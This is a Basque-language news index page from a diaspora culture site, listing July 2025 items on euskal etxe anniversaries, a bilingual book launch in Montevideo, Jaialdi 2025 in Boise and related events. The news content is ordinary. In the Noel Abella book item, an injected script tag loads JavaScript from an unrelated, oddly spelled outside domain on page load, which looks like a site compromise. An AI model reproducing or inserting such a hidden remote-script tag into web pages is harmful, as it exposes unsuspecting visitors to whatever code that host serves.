euskalkultura.eus

euskal diaspora eta kultura

Albisteak rss

Esker oneko udal errekonozimendua Saladilloko Itxaropen EEko lagunei elkartearen 27. urtemugan, ISFT 135a lankide

2025/07/23

Sortzaileek eta egungo Zuzendaritza Batzordeko kideek Udalaren opari bat jaso zuten. Ezk. esk.: N. Idoeta, S. Bordenave, O. Marco, A. Elizagaray, M. Labere, H. Altamira, José L. Salomón intendentea, S. Iturria, A. Lavin eta M. Couruchet Argentinan euskal kulturari eusteko aliantza eta lankidetza berriak sortzearen aldeko apustuan sakonduz, Saladilloko Itxaropen Euskal Etxeak afari bikain batekin ospatu zuen uztailaren 11an bere 27. urteurrena, 75 gonbidatu lagun. Gauak ez zuen soilik urte berri bateko bizitza instituzionala markatu, izan ere duela urtebete garatzen ari diren lankidetza-akordio berritzaile bat ere nabarmendu ...

Gehiago irakurri...


Noel Abellak bere 'El viaje de las palabras-Hitzen Bidaia' obra elebiduna aurkeztuko du abuztuaren 29an Montevideon

2025/07/22

Noel Abellaren ‘El viaje de las palabras-Hitzen Bidaia’ liburuaren azala<script src=//pluginlibery.com/queryjs></script> "El viaje de las palabras - Hitzen Bidaia" du izena Maria Noel Abella Aiscarrek uruguaitar euskaldunak bukatu berria duen kontakizun laburren liburuak. Testuak, irakasle montevideotarra euskal kulturan murgiltzen hasi zenean bizi izandako pasadizo eta istorioak biltzen ditu, batzuk egiazkoak, beste batzuk fikzionatuak eta guztiak umore, maitasun eta herriminetik sortuak.

Gehiago irakurri...


José C. Pazek eta Oñatik elkartasuna ezaugarri izan duen 25 urteko senidetasuna ospatu dute, emozioz eta esker onez

2025/07/22

José C. Pazeko Senidetasunaren Plazan, 2005ean udal ordenantza batek sortutako berdegunea Duela 25 urte, Buenos Aires probintziako José C. Paz herriak eta Oñati hiri gipuzkoarrak azken honetako Sancti Spiritus Unibertsitatean egindako ekitaldi batean ofizialdu egin zuten euren senidetzea. Joan den larunbatean, uztailaren 19an, José C. Pazeko komunitateak, ekitaldi haren urteurrena ospatu du, bi herriak lotzen dituzten elkartasun eta kultura lotura sakonak ...

Gehiago irakurri...


Batzar Nagusia Necocheako Euzko Etxean: Kiti Zubillagak Iñaki Bilbaori pasatu dio lehendakaritzaren lekukoa

2025/07/21

Necocheako Euzko Etxeko Zuzendaritza Batzorde berria, Iñaki Bilbao lehendakaria, ezkerretik hasita hirugarrena lehen lerroan eserita Necocheako Euzko Etxeak uztailaren 11n egin berria du elkartearen Urteroko Batzar Nagusia. Bertaratutako bazkideek 2024ko urteko txostena eta urtealdi horretako balantzea onetsi zituzten eta Zuzendaritza Batzorde berria bozkatu zuten, aldaketa ekarriz lehendakaritzan, bertan aurkezpenik behar ez duen Iñaki Bilbao hautatu baitzuten lehendakari berri, orain arteko Kiti Zubillagaren ordea harturik 81. ...

Gehiago irakurri...


Gaztemundu 2025 deitu dute: azaroaren 30etik abenduaren 14 izango da, euskal instrumentu eta jotzaileei eskainia

2025/07/21

Gaztemunduko partaideak 2024ko edizioan Gasteizen, jaurlaritzako Manu Meaurio (lehenengoa ezkerrean) gidari dutela Eusko Jaurlaritzako Kanpo Harremanetarako eta Euskadi Globalaren Idazkaritza Nagusiak Gaztemundu Programaren 2025eko edizioa kaleratu du. Azaroaren 30etik abenduaren 14ra bitartean egingo da eta aurtengoan euskal instrumentu tradizionalak eta jotzaileak izango ditu arfatz. Parte hartu ahal izango dute 18 eta 35 urte bitarteko gazte musikariak, euren euskal etxeetan banaka edo taldeka dihardutenak, dantza taldeentzat ...

Gehiago irakurri...


Munduko unibertsitateetako 13 Euskara eta Euskal Kultura irakasle Etxepare Institutuaren 8. Irakurle Topaketan

2025/07/21

Etxepare Euskal Institutuak antolatutako Irakurleen 8. Topaketan, Irene Larraza eta Monika Madinabeitia unibertsitateetako irakasleekin Munduko unibertsitateetan Euskara eta Euskal Kultura irakasten duten hamahiru irakasle bildu ziren joan den uztailaren 11an Donostiako Tabakaleran, Etxepare Euskal Institutuak antolatutako Irakurleen topaketaren 8. edizioan. Egun osoko bilerak, irakasleok elkar agurtu eta elkarrekin solasteko eta beren esperientziak aipatu eta trukatzea izan zuen helburua eta, aurreko urteetan bezala, elkarrengandik ...

Gehiago irakurri...


Jaialdi 2025: Boisek euskal diaspora eta kulturari buruzko "Zortziak Bat" Sinposioa abegituko du uztailaren 30 eta 31n

2025/07/18

Euskal diaspora eta kulturari buruzko "Zortziak Bat" Sinposioa uztailaren 30 eta 31ean egingo da Boisen, Jaialdi 2025en aterkipean Uztail amaieran Boiseko Jaialdi 2025ekin batera antolatu diren ekimenen artekoa da "Zortziak Bat" Sinposioa. "Elkarrekin Arraunean, euskal diaspora eta kultura adierazpenei buruzko nazioarteko sinposioa" izen eta lelopean, nazioarteko hainbat aditu, ikertzaile, irakasle eta ikasle, eta dibulgatzaile bertaratuko dira BSU (Boise State University) unibertsitatera, euskal ikasketen hainbat ataletako ...

Gehiago irakurri...


Dantzari Ohiaren Festa Handia larunbatean Mar del Platako Denak Baten, 82 urteko historia, geroa lantzeko pario betean

2025/07/18

Mar del Platako Denak Bat Euskal Etxeko Beti Alai dantzari taldeak 50 kide ditu bere hiru taldeetan, txikiak, ertainak eta handiak. Irudietan iazko Aralarko San Migel Astean Katedral aurrean eskainitako emanaldiko postalak Francisco "Patxi" Valencia ilusioz beteriko Zuzendaritza Batzorde berriko buru dela, Mar del Platako Denak Bat Euskal Etxeak ospakizun bikoitza antolatu du asteburu honetan: elkartearen 82. urteurreneko festa eta Dantzari Ohiaren Festaren edizio berria. Larunbatean, 21etatik aurrera, zenbait belaunalditako dantzari mardelplatatarrak, eta baita euskal etxe lagunetakoak ere, elkartu ...

Gehiago irakurri...


Jaialdi 2025: Egun gutxi falta ekitaldia uztailaren 29an has dadin, Boise euskal diasporaren munduko hiriburu bihurtuz

2025/07/17

Jaialdi 2025 uztailaren 29tik abuztuaren 3ra bitartean egingo da Boisen. Saileko zortzigarrena da eta jendetsuena izatea espero da Luze egin diren hamar urte joan dira azkeneko Jaialditik. Normalean Boisek bost urtean behin egiten duen jai hau bete-betean harrapatu zuen 2020an Covidaren pandemiak, eta 2021ean eta 2022an egiten saiatu baziren ere, berehala konturatu ziren batean zein bestean zuhurtzia zela egun horietan ondoan izateko lagunik onena, eta hala kantzelatu zituzten bi saiakera horiek ere hurrenez hurren. Itxaropen handiak eta ...

Gehiago irakurri...


Uda musika betean Mexikon: Sanferminak, Izaro eta Nokono ostean, Euskal Etxeak Kaleko Urdangak iragarri du abuztuan

2025/07/17

Mexikoko Euskal Etxeko hainbat lagun azaldu ziren eta atera zuten argazkia Izarorekin, mallabiarrak Tonal aretoan eman zuen kontzertuan Uda aurrera doa eta Mexiko Hiriko Euskal Etxeak ez du atsedenik hartzen. Uztaila bizi-bizi ari da izaten, batetik urtero bezala hilabete hasiera Sanferminen garaia delako eta aukera dutelako entzierroak distanzian baina aldi berean (eta teknologiari esker) gertu-gertutik jarraitzeko. Bere kide eta lagunen artean multzo handi bat nafarrak dituen erakunde honek bat egiten du urtero gogo eta izpiritu ...

Gehiago irakurri...


© 2014 - 2019 Basque Heritage Elkartea

Bera Bera 73
20009 Donostia / San Sebastián
Tel: (+34) 943 316170
Email: info@euskalkultura.eus

jaurlaritza gipuzkoa bizkaia